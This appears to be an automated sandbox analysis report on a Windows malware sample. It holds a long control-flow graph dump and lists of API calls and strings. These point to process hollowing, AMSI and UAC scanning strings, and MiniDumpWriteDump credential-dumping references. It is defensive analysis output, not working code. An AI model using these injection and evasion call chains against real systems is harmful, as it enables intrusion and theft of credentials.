31e0e19 35926->35927 35930 31c47ec 11 API calls 35927->35930 35932 31e0e38 35930->35932 35933 31c49a0 35932->35933 35934 31e0e43 35933->35934 35935 31c46d4 35934->35935 35937 31e0e50 35935->35937 35940 31d89d0 20 API calls 35937->35940 35942 31e0e5c 35940->35942 35944 31de24c 16 API calls 35942->35944 35946 31e0e71 35944->35946 35948 31c5818 13 API calls 35946->35948 35950 31e0e84 35948->35950 35952 31c4860 11 API calls 35950->35952 35954 31e0ea5 35952->35954 35955 31c46d4 35954->35955 35957 31e0ebd 35955->35957 35958 31c47ec 11 API calls 35957->35958 35960 31e0edc 35958->35960 35962 31c46d4 35960->35962 35964 31e0ef4 35962->35964 35966 31d89d0 20 API calls 35964->35966 35968 31e0f00 35966->35968 35970 31c4860 11 API calls 35968->35970 35971 31e0f21 35970->35971 35973 31e0f39 35971->35973 35975 31c47ec 11 API calls 35973->35975 35977 31e0f58 35975->35977 35978 31e0f70 35977->35978 35981 31d89d0 20 API calls 35978->35981 35983 31e0f7c 35981->35983 35985 31c4530 11 API calls 35983->35985 35986 31e0f8b 35985->35986 38335 31de1d4 35986->38335 35990 31e0f9d 35993 31c4860 11 API calls 35990->35993 35991 31e2ad8 35992 31c4860 11 API calls 35991->35992 35994 31e2af9 35992->35994 35996 31e0fbe 35993->35996 35997 31e2b04 35994->35997 35999 31e0fc9 35996->35999 36001 31e2b11 35997->36001 36000 31e0fd6 35999->36000 36002 31c47ec 11 API calls 36000->36002 36003 31c47ec 11 API calls 36001->36003 36005 31e0ff5 36002->36005 36006 31e2b30 36003->36006 36008 31c49a0 36005->36008 36014 31e2b3b 36006->36014 36011 31e1000 36008->36011 36013 31c46d4 36011->36013 36016 31e100d 36013->36016 36017 31d89d0 20 API calls 36014->36017 36019 31d89d0 20 API calls 36016->36019 36020 31e2b54 36017->36020 36022 31e1019 36019->36022 36023 31c4860 11 API calls 36020->36023 36025 31c4860 11 API calls 36022->36025 36026 31e2b75 36023->36026 36028 31e103a 36025->36028 36030 31e2b80 36026->36030 36032 31e1045 36028->36032 36033 31e2b8d 36030->36033 36034 31e1052 36032->36034 36036 31c47ec 11 API calls 
36033->36036 36038 31c47ec 11 API calls 36034->36038 36040 31e2bac 36036->36040 36039 31e1071 36038->36039 36043 31e107c 36039->36043 36044 31e2bb7 36040->36044 36046 31e1089 36043->36046 36049 31d89d0 20 API calls 36044->36049 36051 31d89d0 20 API calls 36046->36051 36052 31e2bd0 36049->36052 36054 31e1095 36051->36054 36055 31c4860 11 API calls 36052->36055 36057 31c4860 11 API calls 36054->36057 36058 31e2bf1 36055->36058 36060 31e10b6 36057->36060 36061 31c49a0 36058->36061 36064 31e10c1 36060->36064 36062 31e2bfc 36061->36062 36065 31c46d4 36062->36065 36070 31c47ec 11 API calls 36064->36070 36066 31e2c09 36065->36066 36068 31c47ec 11 API calls 36066->36068 36071 31e2c28 36068->36071 36073 31e10ed 36070->36073 36075 31e2c33 36071->36075 36074 31e10f8 36073->36074 36077 31e1105 36074->36077 36079 31e2c40 36075->36079 36081 31d89d0 20 API calls 36077->36081 36082 31d89d0 20 API calls 36079->36082 36085 31e1111 36081->36085 36086 31e2c4c 36082->36086 36089 31c4860 11 API calls 36085->36089 36087 31c4860 11 API calls 36086->36087 36090 31e2c6d 36087->36090 36092 31e1132 36089->36092 36095 31e2c78 36090->36095 36094 31c49a0 36092->36094 36097 31e113d 36094->36097 36098 31c47ec 11 API calls 36095->36098 36099 31c47ec 11 API calls 36097->36099 36100 31e2ca4 36098->36100 36102 31e1169 36099->36102 36105 31e2caf 36100->36105 36104 31c49a0 36102->36104 36107 31e1174 36104->36107 36111 31d89d0 20 API calls 36105->36111 36108 31e1181 36107->36108 36110 31d89d0 20 API calls 36108->36110 36112 31e118d 36110->36112 36113 31e2cc8 36111->36113 36114 31c4860 11 API calls 36112->36114 36113->35514 36116 31e2ced 36113->36116 36118 31e11ae 36114->36118 36119 31c4860 11 API calls 36116->36119 36121 31c49a0 36118->36121 36124 31e2d0e 36119->36124 36123 31e11b9 36121->36123 36125 31c47ec 11 API calls 36123->36125 36126 31e2d26 36124->36126 36128 31e11e5 36125->36128 36129 31c47ec 11 API calls 36126->36129 36131 31c49a0 36128->36131 36132 31e2d45 36129->36132 36134 31e11f0 
36131->36134 36136 31e2d50 36132->36136 36135 31e11fd 36134->36135 36138 31d89d0 20 API calls 36135->36138 36140 31e2d5d 36136->36140 36139 31e1209 36138->36139 36141 31c49a0 36139->36141 36142 31d89d0 20 API calls 36140->36142 36144 31e1213 36141->36144 36145 31e2d69 36142->36145 38341 31c4d74 36144->38341 36148 31c4860 11 API calls 36145->36148 36156 31e2d8a 36148->36156 36161 31c47ec 11 API calls 36156->36161 36167 31e2dc1 36161->36167 36169 31d89d0 20 API calls 36167->36169 36173 31e2de5 36169->36173 36176 31c4860 11 API calls 36173->36176 36179 31e2e06 36176->36179 36182 31e2e1e 36179->36182 36185 31c47ec 11 API calls 36182->36185 36189 31e2e3d 36185->36189 36190 31e2e55 36189->36190 36191 31d89d0 20 API calls 36190->36191 36193 31e2e61 36191->36193 36195 31c4860 11 API calls 36193->36195 36196 31e2e82 36195->36196 36198 31e2e8d 36196->36198 36201 31c47ec 11 API calls 36198->36201 36203 31e2eb9 36201->36203 36205 31e2ec4 36203->36205 36207 31d89d0 20 API calls 36205->36207 36209 31e2edd 36207->36209 37850 31c7acc 36209->37850 36218 31c4530 11 API calls 36220 31e2f09 36218->36220 36222 31c4860 11 API calls 36220->36222 36224 31e2f2a 36222->36224 36227 31e2f35 36224->36227 36230 31c47ec 11 API calls 36227->36230 36232 31e2f61 36230->36232 36235 31e2f6c 36232->36235 36237 31e2f79 36235->36237 36238 31d89d0 20 API calls 36237->36238 36240 31e2f85 36238->36240 36242 31c4860 11 API calls 36240->36242 36244 31e2fa6 36242->36244 36246 31e2fb1 36244->36246 36247 31e2fbe 36246->36247 36249 31c47ec 11 API calls 36247->36249 36251 31e2fdd 36249->36251 36253 31e2fe8 36251->36253 36256 31e2ff5 36253->36256 36257 31d89d0 20 API calls 36256->36257 36259 31e3001 36257->36259 37863 31df108 36259->37863 36265 31c4530 11 API calls 36267 31e3021 36265->36267 36269 31c4860 11 API calls 36267->36269 36271 31e3042 36269->36271 36274 31e304d 36271->36274 36276 31e305a 36274->36276 36278 31c47ec 11 API calls 36276->36278 36281 31e3079 36278->36281 36282 31e3091 36281->36282 36284 
31d89d0 20 API calls 36282->36284 36286 31e309d 36284->36286 36288 31c4860 11 API calls 36286->36288 36290 31e30be 36288->36290 36292 31e30c9 36290->36292 36293 31e30d6 36292->36293 36295 31c47ec 11 API calls 36293->36295 36300 31e30f5 36295->36300 36303 31d89d0 20 API calls 36300->36303 36305 31e3119 36303->36305 36307 31c4860 11 API calls 36305->36307 36310 31e313a 36307->36310 36311 31e3152 36310->36311 36313 31c47ec 11 API calls 36311->36313 36315 31e3171 36313->36315 36317 31e317c 36315->36317 36318 31e3189 36317->36318 36320 31d89d0 20 API calls 36318->36320 36322 31e3195 36320->36322 36324 31e31a6 36322->36324 37868 31de24c 36324->37868 36331 31c4860 11 API calls 36332 31e31f0 36331->36332 36334 31e31fb 36332->36334 36335 31e3208 36334->36335 36337 31c47ec 11 API calls 36335->36337 36339 31e3227 36337->36339 36342 31e3232 36339->36342 36344 31e323f 36342->36344 36345 31d89d0 20 API calls 36344->36345 36346 31e324b 36345->36346 36348 31c4860 11 API calls 36346->36348 36350 31e326c 36348->36350 36352 31e3277 36350->36352 36354 31c47ec 11 API calls 36352->36354 36356 31e32a3 36354->36356 36359 31e32ae 36356->36359 36362 31d89d0 20 API calls 36359->36362 36363 31e32c7 36362->36363 36365 31c4860 11 API calls 36363->36365 36369 31e32e8 36365->36369 36371 31c47ec 11 API calls 36369->36371 36376 31e331f 36371->36376 36378 31d89d0 20 API calls 36376->36378 36379 31e3343 36378->36379 36381 31c4860 11 API calls 36379->36381 36384 31e3364 36381->36384 36385 31e337c 36384->36385 36387 31c47ec 11 API calls 36385->36387 36391 31e339b 36387->36391 36392 31e33b3 36391->36392 36394 31d89d0 20 API calls 36392->36394 36395 31e33bf 36394->36395 36397 31c4530 11 API calls 36395->36397 36399 31e33ce 36397->36399 36400 31c4530 11 API calls 36399->36400 36402 31e33dd 36400->36402 36404 31c4530 11 API calls 36402->36404 36405 31e33ec 36404->36405 36406 31c4530 11 API calls 36405->36406 36408 31e33fb 36406->36408 36410 31c4530 11 API calls 36408->36410 36411 31e340a 36410->36411 36413 
31c4530 11 API calls 36411->36413 36415 31e3419 36413->36415 36416 31c4530 11 API calls 36415->36416 36418 31e3428 36416->36418 36419 31c4530 11 API calls 36418->36419 36421 31e3437 36419->36421 36423 31c4530 11 API calls 36421->36423 36424 31e3446 36423->36424 36426 31c4530 11 API calls 36424->36426 36427 31e3455 36426->36427 36428 31c4860 11 API calls 36427->36428 36429 31e3476 36428->36429 36430 31e3481 36429->36430 36432 31c47ec 11 API calls 36430->36432 36434 31e34ad 36432->36434 36435 31e34b8 36434->36435 36436 31e34c5 36435->36436 36438 31d89d0 20 API calls 36436->36438 36439 31e34d1 36438->36439 36441 31c4860 11 API calls 36439->36441 36442 31e34f2 36441->36442 36444 31e34fd 36442->36444 36447 31c47ec 11 API calls 36444->36447 36448 31e3529 36447->36448 36450 31e3534 36448->36450 36452 31e3541 36450->36452 36454 31d89d0 20 API calls 36452->36454 36455 31e354d 36454->36455 36457 31e3564 36455->36457 37885 31c7e80 36457->37885 36462 31e370d 36464 31c4860 11 API calls 36462->36464 36463 31e3577 36465 31c4860 11 API calls 36463->36465 36467 31e372e 36464->36467 36468 31e3598 36465->36468 36472 31e3739 36467->36472 36473 31e35a3 36468->36473 36475 31c47ec 11 API calls 36472->36475 36476 31c47ec 11 API calls 36473->36476 36477 31e3765 36475->36477 36478 31e35cf 36476->36478 36483 31e3770 36477->36483 36479 31e35da 36478->36479 36481 31e35e7 36479->36481 36486 31d89d0 20 API calls 36481->36486 36485 31d89d0 20 API calls 36483->36485 36487 31e3789 36485->36487 36488 31e35f3 36486->36488 36489 31c4860 11 API calls 36487->36489 36490 31c4860 11 API calls 36488->36490 36495 31e37aa 36489->36495 36492 31e3614 36490->36492 36497 31e361f 36492->36497 36498 31c47ec 11 API calls 36495->36498 36499 31c47ec 11 API calls 36497->36499 36504 31e37e1 36498->36504 36501 31e364b 36499->36501 36502 31e3656 36501->36502 36505 31e3663 36502->36505 36508 31d89d0 20 API calls 36504->36508 36509 31d89d0 20 API calls 36505->36509 36510 31e3805 36508->36510 36511 31e366f 36509->36511 
36515 31c4a00 11 API calls 36510->36515 36512 31c4860 11 API calls 36511->36512 36514 31e3690 36512->36514 36521 31e369b 36514->36521 36517 31e3838 36515->36517 36519 31c4860 11 API calls 36517->36519 36526 31e3859 36519->36526 36522 31c47ec 11 API calls 36521->36522 36524 31e36c7 36522->36524 36527 31e36d2 36524->36527 36529 31c47ec 11 API calls 36526->36529 36530 31e36df 36527->36530 36534 31e3890 36529->36534 36531 31d89d0 20 API calls 36530->36531 36533 31e36eb 36531->36533 36538 31e3702 36533->36538 36537 31d89d0 20 API calls 36534->36537 36540 31e38b4 36537->36540 38343 31c8048 CreateDirectoryA 36538->38343 36541 31c4860 11 API calls 36540->36541 36544 31e38d5 36541->36544 36547 31e38ed 36544->36547 36549 31c47ec 11 API calls 36547->36549 36551 31e390c 36549->36551 36553 31e3924 36551->36553 36555 31d89d0 20 API calls 36553->36555 36556 31e3930 36555->36556 36557 31c4860 11 API calls 36556->36557 36558 31e3951 36557->36558 36561 31e395c 36558->36561 36563 31c47ec 11 API calls 36561->36563 36566 31e3988 36563->36566 36568 31e3993 36566->36568 36570 31d89d0 20 API calls 36568->36570 36572 31e39ac 36570->36572 36573 31c4860 11 API calls 36572->36573 36575 31e39cd 36573->36575 36578 31c47ec 11 API calls 36575->36578 36581 31e3a04 36578->36581 36583 31d89d0 20 API calls 36581->36583 36585 31e3a28 36583->36585 36588 31e3a3d 36585->36588 36589 31e5530 36585->36589 36590 31c4860 11 API calls 36588->36590 36591 31c4860 11 API calls 36589->36591 36596 31e3a83 36590->36596 36592 31e5551 36591->36592 36597 31e555c 36592->36597 36599 31e3a9b 36596->36599 36600 31c47ec 11 API calls 36597->36600 36602 31c7e5c GetFileAttributesA 36599->36602 36604 31e5588 36600->36604 36603 31e3aa6 36602->36603 36603->36589 36605 31e3aae 36603->36605 36608 31e5593 36604->36608 36606 31c4860 11 API calls 36605->36606 36612 31e3acf 36606->36612 36610 31d89d0 20 API calls 36608->36610 36613 31e55ac 36610->36613 36617 31c47ec 11 API calls 36612->36617 36615 31c4860 11 API calls 36613->36615 
36619 31e55cd 36615->36619 36621 31e3b06 36617->36621 36622 31c47ec 11 API calls 36619->36622 36624 31d89d0 20 API calls 36621->36624 36628 31e5604 36622->36628 36625 31e3b2a 36624->36625 36626 31c4860 11 API calls 36625->36626 36631 31e3b4b 36626->36631 36630 31d89d0 20 API calls 36628->36630 36632 31e5628 36630->36632 36634 31c47ec 11 API calls 36631->36634 36633 31c4860 11 API calls 36632->36633 36635 31e5649 36633->36635 36641 31e3b82 36634->36641 36637 31e5654 36635->36637 36639 31e5661 36637->36639 36643 31c47ec 11 API calls 36639->36643 36644 31d89d0 20 API calls 36641->36644 36645 31e5680 36643->36645 36647 31e3ba6 36644->36647 36649 31e5698 36645->36649 36648 31c4860 11 API calls 36647->36648 36653 31e3bc7 36648->36653 36652 31d89d0 20 API calls 36649->36652 36654 31e56a4 36652->36654 36656 31c47ec 11 API calls 36653->36656 36655 31c4860 11 API calls 36654->36655 36657 31e56c5 36655->36657 36664 31e3bfe 36656->36664 36659 31e56d0 36657->36659 36662 31e56dd 36659->36662 36665 31c47ec 11 API calls 36662->36665 36666 31d89d0 20 API calls 36664->36666 36667 31e56fc 36665->36667 36669 31e3c22 36666->36669 36672 31e5714 36667->36672 36671 31c4860 11 API calls 36669->36671 36676 31e3c43 36671->36676 36674 31d89d0 20 API calls 36672->36674 36677 31e5720 36674->36677 36679 31c47ec 11 API calls 36676->36679 37894 31de398 36677->37894 36688 31e3c7a 36679->36688 36682 31c4530 11 API calls 36684 31e5746 36682->36684 36686 31c4860 11 API calls 36684->36686 36692 31e5767 36686->36692 36690 31d89d0 20 API calls 36688->36690 36697 31e3c9e 36690->36697 36695 31c47ec 11 API calls 36692->36695 36700 31e579e 36695->36700 38344 31c7990 11 API calls 36697->38344 36703 31d89d0 20 API calls 36700->36703 36701 31e3cd3 36705 31c4860 11 API calls 36701->36705 36706 31e57c2 36703->36706 36710 31e3d2a 36705->36710 36708 31c4860 11 API calls 36706->36708 36712 31e57e3 36708->36712 36714 31c47ec 11 API calls 36710->36714 36716 31c47ec 11 API calls 36712->36716 36718 31e3d61 36714->36718 
36719 31e581a 36716->36719 36720 31d89d0 20 API calls 36718->36720 36721 31d89d0 20 API calls 36719->36721 36723 31e3d85 36720->36723 36725 31e583e 36721->36725 36724 31c4860 11 API calls 36723->36724 36730 31e3dcb 36724->36730 36727 31c7acc 42 API calls 36725->36727 36728 31e5848 36727->36728 36729 31df16c 11 API calls 36728->36729 36731 31e585a 36729->36731 37889 31d4dd4 36730->37889 36732 31c4530 11 API calls 36731->36732 36733 31e586a 36732->36733 36734 31c4860 11 API calls 36733->36734 36738 31e588b 36734->36738 36736 31e3df3 36736->35436 36739 31c47ec 11 API calls 36738->36739 36742 31e58c2 36739->36742 36744 31d89d0 20 API calls 36742->36744 36746 31e58e6 36744->36746 36748 31c4860 11 API calls 36746->36748 36751 31e5907 36748->36751 36753 31c47ec 11 API calls 36751->36753 36755 31e593e 36753->36755 36758 31d89d0 20 API calls 36755->36758 36760 31e5962 36758->36760 36762 31c4860 11 API calls 36760->36762 36765 31e5983 36762->36765 36768 31c47ec 11 API calls 36765->36768 36769 31e59ba 36768->36769 36771 31d89d0 20 API calls 36769->36771 36774 31e59de 36771->36774 36775 31c4860 11 API calls 36774->36775 36778 31e59ff 36775->36778 36780 31c47ec 11 API calls 36778->36780 36782 31e5a36 36780->36782 36784 31d89d0 20 API calls 36782->36784 36786 31e5a5a 36784->36786 36787 31df094 11 API calls 36786->36787 36788 31e5a6a 36787->36788 36789 31df108 11 API calls 36788->36789 36790 31e5a7b 36789->36790 36791 31c4530 11 API calls 36790->36791 36792 31e5a8b 36791->36792 36793 31c4860 11 API calls 36792->36793 36794 31e5aac 36793->36794 36795 31c47ec 11 API calls 36794->36795 36796 31e5ae3 36795->36796 36797 31d89d0 20 API calls 36796->36797 36798 31e5b07 36797->36798 36799 31c4860 11 API calls 36798->36799 36800 31e5b28 36799->36800 36801 31c47ec 11 API calls 36800->36801 36802 31e5b5f 36801->36802 36803 31d89d0 20 API calls 36802->36803 36804 31e5b83 36803->36804 36805 31c4860 11 API calls 36804->36805 36806 31e5ba4 36805->36806 36807 31c47ec 11 API calls 36806->36807 
36808 31e5bdb 36807->36808 36809 31d89d0 20 API calls 36808->36809 36810 31e5bff 36809->36810 36811 31c4860 11 API calls 36810->36811 36812 31e5c20 36811->36812 36813 31c47ec 11 API calls 36812->36813 36814 31e5c57 36813->36814 36815 31d89d0 20 API calls 36814->36815 36816 31e5c7b 36815->36816 36817 31c4860 11 API calls 36816->36817 36818 31e5c9c 36817->36818 36819 31c47ec 11 API calls 36818->36819 36820 31e5cd3 36819->36820 36821 31d89d0 20 API calls 36820->36821 36822 31e5cf7 36821->36822 36823 31c4860 11 API calls 36822->36823 36824 31e5d18 36823->36824 36825 31c47ec 11 API calls 36824->36825 36826 31e5d4f 36825->36826 36827 31d89d0 20 API calls 36826->36827 36829 31e5d73 36827->36829 36828 31e7568 36830 31c4860 11 API calls 36828->36830 36829->36828 36831 31c4860 11 API calls 36829->36831 36833 31e7589 36830->36833 36832 31e5da8 36831->36832 36834 31c7e5c GetFileAttributesA 36832->36834 36835 31c47ec 11 API calls 36833->36835 36836 31e5dcb 36834->36836 36839 31e75c0 36835->36839 36836->36828 36837 31e5dd3 36836->36837 36838 31c4860 11 API calls 36837->36838 36841 31e5df4 36838->36841 36840 31d89d0 20 API calls 36839->36840 36842 31e75e4 36840->36842 36844 31c47ec 11 API calls 36841->36844 36843 31c4860 11 API calls 36842->36843 36845 31e7605 36843->36845 36846 31e5e2b 36844->36846 36847 31c47ec 11 API calls 36845->36847 36848 31d89d0 20 API calls 36846->36848 36851 31e763c 36847->36851 36849 31e5e4f 36848->36849 36850 31c4860 11 API calls 36849->36850 36853 31e5e70 36850->36853 36852 31d89d0 20 API calls 36851->36852 36854 31e7660 36852->36854 36856 31c47ec 11 API calls 36853->36856 36855 31c4860 11 API calls 36854->36855 36857 31e7681 36855->36857 36858 31e5ea7 36856->36858 36859 31c47ec 11 API calls 36857->36859 36860 31d89d0 20 API calls 36858->36860 36863 31e76b8 36859->36863 36861 31e5ecb 36860->36861 36862 31c4860 11 API calls 36861->36862 36865 31e5eec 36862->36865 36864 31d89d0 20 API calls 36863->36864 36866 31e76dc 36864->36866 36868 31c47ec 11 API 
calls 36865->36868 36867 31c4860 11 API calls 36866->36867 36869 31e76fd 36867->36869 36870 31e5f23 36868->36870 36871 31c47ec 11 API calls 36869->36871 36872 31d89d0 20 API calls 36870->36872 36875 31e7734 36871->36875 36873 31e5f47 36872->36873 36874 31c4860 11 API calls 36873->36874 36877 31e5f68 36874->36877 36876 31d89d0 20 API calls 36875->36876 36878 31e7758 36876->36878 36880 31c4860 11 API calls 36877->36880 36879 31c4860 11 API calls 36878->36879 36881 31e7779 36879->36881 36882 31e5fa0 36880->36882 36883 31c47ec 11 API calls 36881->36883 36884 31c47ec 11 API calls 36882->36884 36885 31e77b0 36883->36885 36886 31e5fd7 36884->36886 36887 31d89d0 20 API calls 36885->36887 36888 31d89d0 20 API calls 36886->36888 36889 31e77d4 36887->36889 36890 31e5ffb 36888->36890 36892 31e8318 36889->36892 36893 31e77e9 36889->36893 36891 31c4860 11 API calls 36890->36891 36896 31e601c 36891->36896 36895 31c4860 11 API calls 36892->36895 36894 31c4860 11 API calls 36893->36894 36899 31e780a 36894->36899 36897 31e8339 36895->36897 36898 31c47ec 11 API calls 36896->36898 36901 31c47ec 11 API calls 36897->36901 36902 31e6053 36898->36902 36900 31c47ec 11 API calls 36899->36900 36904 31e7841 36900->36904 36905 31e8370 36901->36905 36903 31d89d0 20 API calls 36902->36903 36906 31e6077 36903->36906 36908 31d89d0 20 API calls 36904->36908 36909 31d89d0 20 API calls 36905->36909 36907 31c4860 11 API calls 36906->36907 36914 31e6098 36907->36914 36910 31e7865 36908->36910 36911 31e8394 36909->36911 36912 31c4860 11 API calls 36910->36912 36913 31c4860 11 API calls 36911->36913 36916 31e7886 36912->36916 36917 31e83b5 36913->36917 36915 31c47ec 11 API calls 36914->36915 36920 31e60cf 36915->36920 36919 31c47ec 11 API calls 36916->36919 36918 31c47ec 11 API calls 36917->36918 36923 31e83ec 36918->36923 36922 31e78bd 36919->36922 36921 31d89d0 20 API calls 36920->36921 36924 31e60f3 36921->36924 36926 31d89d0 20 API calls 36922->36926 36927 31d89d0 20 API calls 36923->36927 36925 
31c4860 11 API calls 36924->36925 36932 31e6114 36925->36932 36928 31e78e1 36926->36928 36929 31e8410 36927->36929 36930 31c4860 11 API calls 36928->36930 36931 31c4860 11 API calls 36929->36931 36934 31e7902 36930->36934 36935 31e8431 36931->36935 36933 31c47ec 11 API calls 36932->36933 36938 31e614b 36933->36938 36936 31c47ec 11 API calls 36934->36936 36937 31c47ec 11 API calls 36935->36937 36939 31e7939 36936->36939 36940 31e8468 36937->36940 36941 31d89d0 20 API calls 36938->36941 36944 31d89d0 20 API calls 36939->36944 36945 31d89d0 20 API calls 36940->36945 36942 31e616f 36941->36942 36943 31c4860 11 API calls 36942->36943 36951 31e61a9 36943->36951 36946 31e795d 36944->36946 36947 31e848c 36945->36947 36948 31c47ec 11 API calls 36946->36948 36949 31c4860 11 API calls 36947->36949 36950 31e7975 36948->36950 36954 31e84ad 36949->36954 36953 31d85bc 18 API calls 36950->36953 36952 31c4860 11 API calls 36951->36952 36958 31e61e1 36952->36958 36955 31e7986 36953->36955 36957 31c47ec 11 API calls 36954->36957 36956 31c4860 11 API calls 36955->36956 36961 31e79a7 36956->36961 36959 31e84e4 36957->36959 36960 31c47ec 11 API calls 36958->36960 36963 31d89d0 20 API calls 36959->36963 36965 31e6218 36960->36965 36962 31c47ec 11 API calls 36961->36962 36967 31e79de 36962->36967 36964 31e8508 36963->36964 36968 31e851d 36964->36968 36969 31e93a1 36964->36969 36966 31d89d0 20 API calls 36965->36966 36970 31e623c 36966->36970 36974 31d89d0 20 API calls 36967->36974 36972 31c4860 11 API calls 36968->36972 36971 31c4860 11 API calls 36969->36971 36973 31c4860 11 API calls 36970->36973 36978 31e93c2 36971->36978 36975 31e853e 36972->36975 36980 31e625d 36973->36980 36976 31e7a02 36974->36976 36979 31e8556 36975->36979 36977 31c4860 11 API calls 36976->36977 36984 31e7a23 36977->36984 36981 31c47ec 11 API calls 36978->36981 36982 31c47ec 11 API calls 36979->36982 36983 31c47ec 11 API calls 36980->36983 36988 31e93f9 36981->36988 36985 31e8575 36982->36985 36989 31e6294 

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              • GetThreadContext.KERNEL32(0000089C,03247424,ScanString,032473A8,031DA93C,UacInitialize,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,UacInitialize,032473A8), ref: 031D9602
                                                                                                • Part of subcall function 031D8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                                • Part of subcall function 031D8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                                • Part of subcall function 031D7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              • SetThreadContext.KERNEL32(0000089C,03247424,ScanBuffer,032473A8,031DA93C,ScanString,032473A8,031DA93C,Initialize,032473A8,031DA93C,000008A0,003AEFF8,032474FC,00000004,03247500), ref: 031DA317
                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000089C,00000000,0000089C,03247424,ScanBuffer,032473A8,031DA93C,ScanString,032473A8,031DA93C,Initialize,032473A8,031DA93C,000008A0,003AEFF8,032474FC), ref: 031DA324
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 2388221946-51457883
                                                                                              • Opcode ID: 4f57798019dfd46501e0f8c38d7a4077720e8368b3f56d8aeff0f294727c8965
                                                                                              • Instruction ID: f29cacbe1708d1324b85b206affedfccaf861d2672cf724fa47736ebc37bdcbf
                                                                                              • Opcode Fuzzy Hash: 4f57798019dfd46501e0f8c38d7a4077720e8368b3f56d8aeff0f294727c8965
                                                                                              • Instruction Fuzzy Hash: 95E21C38A142689FCB16FB65DC91BCEB3B9AF9D200F1041A5A055AF215DF30EE86CF51

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              • GetThreadContext.KERNEL32(0000089C,03247424,ScanString,032473A8,031DA93C,UacInitialize,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,UacInitialize,032473A8), ref: 031D9602
                                                                                                • Part of subcall function 031D8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                                • Part of subcall function 031D8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                                • Part of subcall function 031D7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
